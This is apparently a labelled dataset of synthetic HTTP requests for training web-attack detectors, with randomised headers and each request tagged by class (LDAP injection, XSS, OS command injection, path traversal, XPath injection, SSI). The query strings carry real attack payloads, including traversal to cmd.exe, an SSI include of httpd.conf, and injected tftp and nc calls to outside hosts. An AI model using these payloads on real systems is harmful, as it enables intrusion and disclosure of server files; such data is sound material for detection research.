If-Unmodified-Since: Tue, 02 May 06 21:32:11 CET
If-Match: "WK3pCo@36pI6kQ3w"
If-None-Match: *
If-Range: Sun, 31 Jul 05 12:02:03 UTC
Max-Forwards: 7646
MIME-Version: 3.6
Pragma: Dte6eoa=ooIoouer
Proxy-Authorization: setyft ncadaa=lsid
Authorization: Basic aW5vZHRsOW06ejR1b2Vl
Range: 572-0
Referer: http://www.srem5.it/nchia/oaki8/lspslea/2svrjitt/189a1sb.dll
TE: trailers
Trailer: If-Range
User-Agent: emqtpnego/8.7
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3931x2579
Via: 9.1 www.7efCehq.jpg, 4.2 143.109.122.191, Meyewd/1.8 www.loYz.jpg
Transfer-Encoding: compress
Upgrade: rtu9j/1.3, ayt1st/7.1, iEp/9.8
Warning: 258 www.ai0cAey.jpg "lIihOld" "Mon, 28 Jul 08 15:46:13 CET"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41589
Start - Id: 38352
class: LdapInjection
GET /logchildBN-@zlqupdatelvSz.pl?et0xXXbX1Gwheret=701%29%28%26%28objectClass%3Df1s%29%28%7C%28sn++++%3D++tsnh%29%28cn%3Do2e++J*%29%29&pXncei3esieet4=sEehkadpc%2F HTTP/1.1
Host: www.baesedir.gov
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-6;q=0.1, euc-tw;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="458"
Date: Thu, 29 Jul 04 05:12:12 GMT
ETag: "eg_Owd@DHvhvOHK"
Expect: imesc=bd5Ni;kahealns=at3ue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Wed, 06 Jun 07 19:33:56 UTC
If-Unmodified-Since: Mon, 26 Apr 04 09:33:28 UTC
If-Match: "yzc6eQdiiKE7Bnon39"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 0.4
Pragma: mh='ttlrewi'
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM SHNkOG5lZ2E1bWgzNWlpZkhqdHNleXRTaW1sbkluM2N1ZW9PcnlSdQ==
Range: 0-190754,-136
Referer: http://www.q8nset7.cz/sroh/ohqkelu/iorhv/Aon44.jpg
TE: trailers
Trailer: Accept-Encoding
User-Agent: gch2seeda6 (tw8lTB; sCSd1@Ld; oAZ4Sk; gZ7TIIs0; cE22grRS)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8555x781
Via: HTTP/6.0 www.nctttu.html
Transfer-Encoding: gzip
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38352
Start - Id: 47016
class: XSS
GET /nihsrhwlaw/z3r/-8t8S_AMGD/LEogau/tRCqGpiV@4j9b6d/5nmi5tyaoc9hnhe/eMIKjfVY6PqRl-NR9.cfm?6i7laextRsu=a5%265trbodyviiframe&NYiframelfVK=0670546316&ufn=1&j8idEfao=n+Tlt&baadstOctwH=%7Ce+unhc8%3EORdheopenan%40L&zd9lnraepUaE5=wdeneho&itns=%3Cimg+src++%3D%22+++++mocha%3A%5Balert++%28%27yteil%27%29%3B%5D+%22+++%3E&yA=uedzlees3t2EHgh&lVRct=x%7Eaaba HTTP/1.1
Host: www.sncen.st
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257;q=0.2, cp-936;q=0.0
Accept-Encoding: compress;q=0.0, deflate, gzip;q=0.0, deflate
Accept-Language: fu6tPl-hUib, l1-edeg;q=0.4, tyeNkz-9h3r;q=0.7, hti-asdEean
Cache-Control: no-cache
Client-ip: 18.81.58.217
Cookie: qds0w=iuweavlarhfb
Cookie2: $Version="147"
Date: Thu, 28 Feb 08 02:08:31 GMT
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Fri, 09 Apr 10 12:49:02 GMT
If-Unmodified-Since: Thu, 01 Feb 07 23:38:35 UTC
If-Match: *
If-None-Match: "uVTHARtNL_cVo4-YO"
If-Range: "-2P_0EwNfj_245RR8"
Max-Forwards: 9
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWV0YmV0Mm9iQW9DOGd5TmV4U3R4bXRZNnNhbGRlaG9Wdmk=
Authorization: Digest algorithm=rk8ftoe
Range: 5-22964
Referer: /eeci0e/jJneeet/eE4dsn.js
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.0 (compatible; Konqueror/5.4; Win 9x; QEhse7oa; ceei)
UA-CPU: Sparc
UA-Disp: 128,634,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7231x6416
Via: enu7/8.3 40.116.44.167
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 523 www.sioteo.shtml:61 "e4ipraamice7" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 239527167
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47016
Start - Id: 38355
class: LdapInjection
GET /hIz4VGkQ8UbEYvfarndu/avEfLc.klL.exe?etnevrhea4bh=%29++++%28++%7C++++%28displayName%3Dhad*%29++%28name++++%3D+had*%29%28+mail%3Dhad*+%29&gD=t0ae HTTP/1.0
Host: www.zsuo.biz
Connection: close
Accept: text/plain;q=0.9
Accept-Charset: iso-8859-3, utf-7;q=0.4, iso-8859-6;q=0.5, windows-1251, x-mac-korean
Accept-Encoding: *
Accept-Language: p-sezfmrrs;q=0.5, o-8midn;q=0.0, sdgeil-biaSns;q=0.8, oarscoz9-5;q=0.1
Cache-Control: max-age=0
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="67"
Date: Tue, 14 Apr 09 24:37:38 UTC
ETag: W/"5LoC-V6hl1TUEpQHFV"
Expect: 100-continue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Tue, 07 Aug 07 24:16:11 UTC
If-Unmodified-Since: Mon, 26 Apr 04 09:33:28 UTC
If-Match: "yzc6eQdiiKE7Bnon39"
If-None-Match: "m2OiEJTR038HFrW"
If-Range: *
Max-Forwards: 2
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest response="24bdDc9027Eaafbdb25b48aD0Bc2B85e"
Authorization: NTLM SHNkOG5lZ2E1bWgzNWlpZkhqdHNleXRTaW1sbkluM2N1ZW9PcnlSdQ==
Range: 0-190754,-136
Referer: /jiIajoog/nsei9h/npni/evnwt.asmx
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 6.8; rg-la; rv:0.7.7) Gecko/11362292
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8555x781
Via: 7.2 115.92.196.7:1, 6.5 www.earnczr4.html
Transfer-Encoding: gzip
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38355
Start - Id: 43831
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.irnr.org
Connection: ljil
Accept: text/*, audio/x-wav, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 172.122.152.72
Cookie: 9a3epnq=63;d5etxlt=c)nE4passthruiframemhat1apDoaEA;eehtw1psatkoaui=22165;yih0un=0045697
Cookie2: $Version="567"
Date: Sun, 13 Jan 08 10:06:58 GMT
ETag: "XjNn@14_sGqxnijJkTZ"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "j@5YzCedrakc5Y9"
If-None-Match: *
If-Range: "JJLnz_Jj8MknVuRPq"
Max-Forwards: 8
MIME-Version: 9.7
Pragma: hm1ismir=u0Hafm
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM bXllcm5qdDV1U2VkYXBkd2lwbXRlaGloYWFzNWR1bnQzag==
Range: -694,-90120,-768
Referer: http://akt6eh.net/ewz3Ta/ptnpd.fgf
TE: trailers,trailers
Trailer: Accept
User-Agent: szTFl1 http://www.rkdl.it
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: 9.8 4.246.171.36
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 396755923911
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43831
Start - Id: 47434
class: XSS
GET /8MU/nerHte/duLoucf/Ies/ohS2tntmfoteBldeernc/p1bxc/ohw5ueo8TtRa/xp_lDmBnph-CRvKfE0Nt/naderhr1CceXeer2ieis/ez8/eqKhcSNObbh7K_1L9bc.exe?XKtmKfmSSZWB=%3Ciframe++++src%3D+%22+++vbscript%3A%5Balert++++%28%27tddam%27%29%3B%5D++++%22%3E&ifaf7oz0edTiYe=x7ndMbKMRuy&q0xVhtgR=601 HTTP/1.0
Host: www.sarooHrw.gov
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.9
Accept-Encoding: 
Accept-Language: snmi-aaa;q=0.1, oO-3u, jfh-uaae, y6Jow-m
Cache-Control: only-if-cached
Client-ip: 150.26.240.194
Cookie: ip6eenaeehpt= le;XB2tVQKvoreplace=errs
Cookie2: $Version="05"
Date: Sun, 28 Oct 07 13:00:01 UTC
ETag: W/"USbOQLZFotY12CP"
Expect: 100-continue
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Wed, 27 Oct 04 12:08:11 UTC
If-Match: *
If-None-Match: "bKL2lx@h0WK9PGcNzi"
If-Range: Mon, 25 Jan 10 06:50:33 UTC
Max-Forwards: 0
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: Digest nonce
Range: 13744-31405
Referer: http://cttohl.uk/nyArlt/49oue/seieifli/nqnos.asp
TE: chunked
Trailer: Referer
User-Agent: Mozilla/6.6 (Windows; U; WinNT 6.0; kt-wi; rv:5.1.7) Gecko/89417953
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 2.7 www.esineboj.gif, 2.9 193.87.222.72, HTTP/2.0 www.senp.html
Transfer-Encoding: compress
Upgrade: cn0/7.2, eS1l/7.0, wilq/0.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47434
Start - Id: 48743
class: XPathInjection
GET /d2e-m/iNdDV5x/c@uvFs1p-9WIIDJk/p_S_3zL8x1/abj@ge/edK4_ZXG/acywC/lO@kxujlP7Omt/h97dkf.mdb?608PI.u=xm&ytoaA5udLsml=iaardelete%28scrmr%3De%2Bien&FCGNLinsU4G4U=Oiof6obsetc%3Co%25o&ieEtuuastoj=6+or+++++edesa%2Fn2ht6%2FzSu%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D120%5D++or+++++2%3D&b1csTaEae7=ewUMn5hK&Oeeitl=ia&iree=txf5qaDEhM&4tee=+y4ee&rpa3iXwdnti9=rtg1y4stru1etri&eSO=nmi+&2ts=+lsr&wotn9=tapae8seiTotmn&yeen=03728&eteeiOTdeeiiu=ltneeem1halErlte HTTP/1.1
Host: 206.8.52.14:80
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 52.241.218.21
Cookie: suonparnitse=kdetaw
Cookie2: $Version="1"
Date: Thu, 17 Jan 08 13:11:46 CET
ETag: W/"PspXBVtFw6MVjqF-1t"
Expect: bcutdha=fLiR
From: lYglyt2@7smfrhi.org
If-Modified-Since: Tue, 06 Jan 04 06:57:16 GMT
If-Unmodified-Since: Wed, 14 Apr 10 21:43:39 UTC
If-Match: "uT-ue5yiX1eUubDT."
If-None-Match: *
If-Range: Sun, 09 Sep 07 09:32:50 CET
Max-Forwards: 220
MIME-Version: 9.4
Pragma: orR='tItvsia9'
Proxy-Authorization: Digest opaque="dmhss"
Authorization: ipell hd9inJu4=onthee52
Range: -506333,18704-151605
Referer: /tnrRt/4zHTinR/hqAesdi/tdeetm.wav
TE: deflate,gzip;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 1.6; es-zm; rv:7.1.9) Gecko/66599270
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: 2.0 www.nNmdo1t.htm, 9.0 179.133.73.65
Transfer-Encoding: identity
Upgrade: dHRher/7.4, eng/4.5
Warning: 110 www.nsio.html "gbuonm" "Sun, 29 Jul 07 09:27:30 CET"
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48743
Start - Id: 38430
class: LdapInjection
GET /ttxINetaeisa/lt5Tnrks0t1l/ZQxtermd9BnxSkdhk/s1astnnibliymac1yA/e0hItMg7tAY4PK/hie.css?esh=ezaf%5Ds&n8rei=i1styleesc&pswzl=pM6o_XwntgdL&letEpdamgts=%3AcnullIc&whnlJksniho=etih&ortmsrpxnat=fQi6a5L&9t=hutrtn400gp&eho0=%29++%28%7C+++%28displayName%3Dhad*%29+%28name+++%3Dhad*++++%29%28++mail%3Dhad*+%29&fuIo6tiheee8Isl=n9WnMoT&7rasaN0opedBob=0elmo+ HTTP/1.0
Host: 210.25.241.139
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.6, deflate, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 37.157.72.85
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Sat, 02 May 09 05:00:13 UTC
ETag: "h2hIDmqhIElhbZTSdh1"
Expect: 100-continue
From: Le6sx3@8TUli.gov
If-Modified-Since: Sun, 07 Mar 04 22:56:58 GMT
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: "NOm5q08J2HJZda2If"
If-None-Match: *
If-Range: *
Max-Forwards: 2717
MIME-Version: 3.3
Pragma: s='ecco'
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: Digest opaque="iicoh"
Range: -03,38-
Referer: /h1nrcy/sraNnhi.php
TE: gzip
Trailer: Transfer-Encoding
User-Agent: a0@2JB http://www.hcod.biz
UA-CPU: 68000
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: soon/5.4 64.89.237.87
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38430
Start - Id: 44606
class: OsCommanding
GET /W3au2a/opRnetcatPE/6Y/eq3p0--AapGf1.html?k2Rsnr6=9nLB15n3MAY%40&ts0ed=stdin%3F&Lzlegoytetlwmn=8&7hohi9ttltedsS=aeeOcatiHhsphpo&2iH8nnw=grr&tmbor1erdrE9t=thduhfecnullnmilnU&eso2RS5processing-instruction=0230&d2stt=255.17.80.207++++%3B++++tftp+192.168.10.33+test.txt&mtbitEe4=-oae%3Fhttpn+nvrzhya%26u&Eososrctlt=sxel&v18cultl4=tMRaFzKN&tt=58&em=beu HTTP/1.0
Host: 11.137.42.194
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-8-i, koi8-r;q=0.9, windows-1250;q=0.7, iso-8859-6
Accept-Encoding: identity, gzip;q=0.2, identity, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 234.131.254.239
Cookie: Csaehdtthkjnhj=802;eci=626936;lmo=7;li5vaeT3sItggeu=10647
Cookie2: $Version="11"
Date: Wed, 02 Feb 05 04:23:46 CET
ETag: W/"0iYg@SMqR@Wb_t3R"
Expect: 100-continue
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Sat, 24 Apr 10 06:39:59 CET
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: "gBM_dAGU6ieKTuaJLGaJ"
If-None-Match: *
If-Range: "wS1FdB.kn_N9Amme00j"
Max-Forwards: 567
MIME-Version: 1.7
Pragma: 1ctau='0u'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: /dizalg/QgoN5tit.txt
TE: deflate
Trailer: Trailer
User-Agent: rwpeYQ http://www.nhkEd.ch
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/4.4 191.31.16.89, 4.9 135.206.46.110
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44606
Start - Id: 36035
class: PathTransversal
GET /rqfQDiZFF1eMc/rH1osr/tmieqieaioT5/7noentu4aansnt.shtml?ico=aNet-&adtilosoRweesc=54&ets6hoor=sIOIii&u68QpZh-0a=e%28eiframeo%28vbscriptshtR%3Bc&mletxahhseMli=..%2F..%2F..%2FWINNT%2Fautoexec.bat&jtelnetDq4l9=e+nnru&tkc0igo3arr3mo3=8gooo HTTP/1.0
Host: www.Eebhe.gov:80
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity, identity;q=0.6, gzip;q=0.3, compress;q=0.0
Accept-Language: *
Cache-Control: max-stale=8245
Client-ip: 126.60.242.180
Cookie: 3repx9inrRe73A=0314880501
Cookie2: $Version="8"
Date: Fri, 09 Jul 04 20:08:18 GMT
ETag: W/"-UcaNiZRUoZWfy8_7_g"
Expect: 100-continue
From: yko0aa0@wnoagzEgT.de
If-Modified-Since: Mon, 06 Apr 09 14:02:32 UTC
If-Unmodified-Since: Wed, 24 May 06 12:49:29 UTC
If-Match: "KXOfqYbLOulBH9BZM"
If-None-Match: "jWheKQLMpVZWKOp4p"
If-Range: Fri, 28 Aug 09 12:25:19 UTC
Max-Forwards: 81
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nonce
Range: 709-485
Referer: /4ht6eti/uOsE/ipjStomN/tfh5utt/hHaSoan.mdb
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: hu4htgiaeh/4.8.3
UA-CPU: PowerPC
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/4.0 185.69.198.91
Transfer-Encoding: gzip
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36035
Start - Id: 38901
class: LdapInjection
GET /inef5ta.mspx?s4ga=asU6Cstoypaoxsr&aIrmaje=%29++%28%7C++%28displayName%3Dhad*%29%28name+++%3D++had*++%29%28+++mail%3Dhad*%29&leobisTE7ae=boot.inieucopy+eioryqb0dw+a&Nrltns1hEjZh=ajO0gfUA&wts=soqdnpoyZ&daasOtlull=eXXpt1ih&rtpErsr=fadsicw+mekrqboot.inio&Aft0AkWbboot.ini=e9r1s&5oepRo7tt3saY=9eetuUeenar&kssnmertlade=%24Szk&z1mm_MTttdGe=tms556iand%27ndfromGd&5s=eDp1SrSAJyt HTTP/1.1
Host: 248.7.194.252:8487
Connection: keep-alive
Accept: video/*;q=0.2, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale
Cookie: nbye92e8H=pnNckyiaecho5&ww;ne4l=-ttdivchildpasswddes<h0eb;asenlh3=s7Ones6ee4iodathb;basec=nrtnf;allmQ0=h httppd;to1eirnhcbne=t4
Date: Tue, 19 Jul 05 08:27:35 GMT
ETag: W/"2GEamMx-ggUI9_T@t"
Expect: fnIaiakT
If-Unmodified-Since: Wed, 03 Mar 04 18:11:01 GMT
If-None-Match: *
If-Range: Fri, 17 Nov 06 15:17:21 UTC
Max-Forwards: 3
Pragma: no-cache
Authorization: 77rz aCeoso2=eaoz
Range: 423-568,877941-960,834220-453
Referer: /fsommFte/on0e/sk4rtse/e9sai/teteger.rar
TE: trailers,gzip;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.1 (X11; U; Solaris 3.6; xa-nr; rv:0.3.9) Gecko/37824360
UA-OS: Solaris
Via: 4.6 www.0ddt.htm
Transfer-Encoding: gzip
X-Serial-Number: 99898684535119255

null

End - Id: 38901
Start - Id: 39748
class: SSI
GET /otNnCCzsRlS/6__Q8E5c/wXihg4lIJBEbvhmZ6OmC.jpeg?walteumagaosEGs=58&zeipiphskS65fp=eLsutiezkst&ozn=705795518&eg0=52562389&fv1cllhcur=ao&Zoohzsurhc=epeboot.inimushutdowncedpdivo&ftjsh=eett%3BeBkr+ideL+&datmoc2tdr=%3C%21--%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&srih=ke&Hio=rmi%29w%24-seemsylzodpA&havingNVTdnshutdownWyBv1=qNn6gwmqeehsEr&1cf=690&itt=1054326 HTTP/1.1
Host: www.s0ros.org
Connection: close
Accept: application/*;q=0.7
Accept-Charset: x-mac-chinesesimp, cp-950;q=0.1, windows-1250
Accept-Encoding: compress;q=0.8, gzip
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 187.4.219.205
Cookie: t1a3hhu1nEata=ic;youmrnitt=hddzeez;mlezid=tm\;l3rrm5onsni0iE=eQy-pRHp.
Cookie2: $Version="7"
Date: Sun, 11 Feb 07 01:57:15 GMT
ETag: W/"kJbc9fupXLm3CC3oW."
Expect: td7ebjge
From: n4tbla@ol8e.st
If-Modified-Since: Wed, 29 Nov 06 07:21:35 GMT
If-Unmodified-Since: Thu, 16 Oct 08 02:05:42 GMT
If-Match: "hdKwoB-gsr5C2jZDq"
If-None-Match: *
If-Range: Mon, 03 Jul 06 13:28:37 CET
Max-Forwards: 3
MIME-Version: 3.3
Pragma: A='ri8ea'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic RWFjczVubXQ6Z3E2QW9vcw==
Range: -8768,74-87
Referer: /caledtid/odadu/xcatx/zerun/hEbpo.asp
TE: trailers
Trailer: Date
User-Agent: trAnDmalAt
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 930x2188
Via: FTP/3.9 www.gno3.htm:62, FTP/0.5 www.pnuR2i.png, 0.4 207.5.202.79:04583
Transfer-Encoding: gzip
Upgrade: 2to/5.7, h7i/2.7, ufnrto/8.8, fpto/1.4
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 177.241.180.13
X-Serial-Number: 43717297958345
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39748
Start - Id: 35695
class: XPathInjection
GET /oyDYE1b0.9uaL/on.cgi?enyboeushl=D8%27+or+++++%28i+++%3C++count%28taqot%2Fchild%3A%3Atext%28%29%29+and++++j+++%3C+count%28dayac%2Fchild%3A%3Acomment%28%29%29+++++and++++k+++++%3C++++count%28NoNs%2Fchild%3A%3A*%29++++%29++++or++++%27tmg%27++%3D+++%27++++rl%27++or&8tGiTUyIQ=r%40Tkw4064l6b&heAotyd9m=96&rrT=ogatmoat3nohttpsovzgfo%7C+&gO6ov9na=132810154&mMV%uadocumentljk4Y=wHqy8hl&waua1Att=67498805&i3nemqtvr=jficiehhlmlxrt HTTP/1.0
Host: www.cnioodA.biz
Connection: keep-alive
Accept: video/*;q=0.7, video/*, text/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate
Accept-Language: *;q=0.9
Cache-Control: max-age=52382
Client-ip: 87.168.72.128
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="0"
Date: Sat, 24 Jan 04 11:50:48 UTC
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: fbtsncr
From: xcsXifnE@tneljth.ch
If-Modified-Since: Fri, 06 Feb 09 22:26:13 UTC
If-Unmodified-Since: Tue, 22 Sep 09 12:37:55 UTC
If-Match: *
If-None-Match: "FF.i3kLXtZEKPxuI30"
If-Range: *
Max-Forwards: 5149
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: Basic aWJVZnRpOmVmaEU=
Range: 5225-,8-9,1-
Referer: /mqnc.jpg
TE: trailers
Trailer: If-Range
User-Agent: 5arsaI
UA-CPU: PowerPC
UA-Disp: 9150,2216,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.8 176.165.200.193
Transfer-Encoding: identity
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 211.136.86.197
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35695
Start - Id: 43420
class: OsCommanding
GET /lPl85cinD/uLwFgrhyDxw/tnireeolEhirrp/prvmihvD/5tC.LWc5f9MnPY5AEBgC/opn36/LPT3eww4Z6i0positionH/nZC_GYqQy9xpdr/e4JKA5.@QoY7Vc2/eo5UtfplDt.jpeg?diyjaitt=peW&u24tn0mebtr=8&7avkhpba=%250a++nc+www.getedelateel.com+++80+%3B&5dqnsdashh=6717285580&o3traooemclna=84943&iatTlyaoub=wnaee2oedtiHov&jiot7dmy=dWdlohGp9YFs&ux=294952428&eh=598&twenc4otsewN=rtfoospiatal1ivi HTTP/1.1
Host: 165.57.54.178
Connection: keep-alive
Accept: audio/*, image/png
Accept-Charset: gb2312, utf-8, iso-8859-3, windows-874
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 115.151.244.56
Cookie: ei0eshh3de=proo@Oaoohedrop
Cookie2: $Version="4"
Date: Fri, 03 Sep 04 16:49:53 GMT
ETag: "4NsrfC_QJwuMw5JBGe"
Expect: oteD40
From: eM8p@ehnasbf.it
If-Modified-Since: Sat, 15 Sep 07 20:03:13 UTC
If-Unmodified-Since: Sun, 25 Jul 04 22:06:29 UTC
If-Match: *
If-None-Match: *
If-Range: "XVF7v0palxOKh_Xy"
Max-Forwards: 7739
MIME-Version: 7.3
Pragma: tzh='y'
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: 5130-,89497-47998,93-50140
Referer: http://bte6.uk/C6iieui/opat5fYL.ace
TE: chunked;q=0.2
Trailer: Warning
User-Agent: lbMm0taflbIdi4yhrt
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: gzip
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43420
Start - Id: 37512
class: LdapInjection
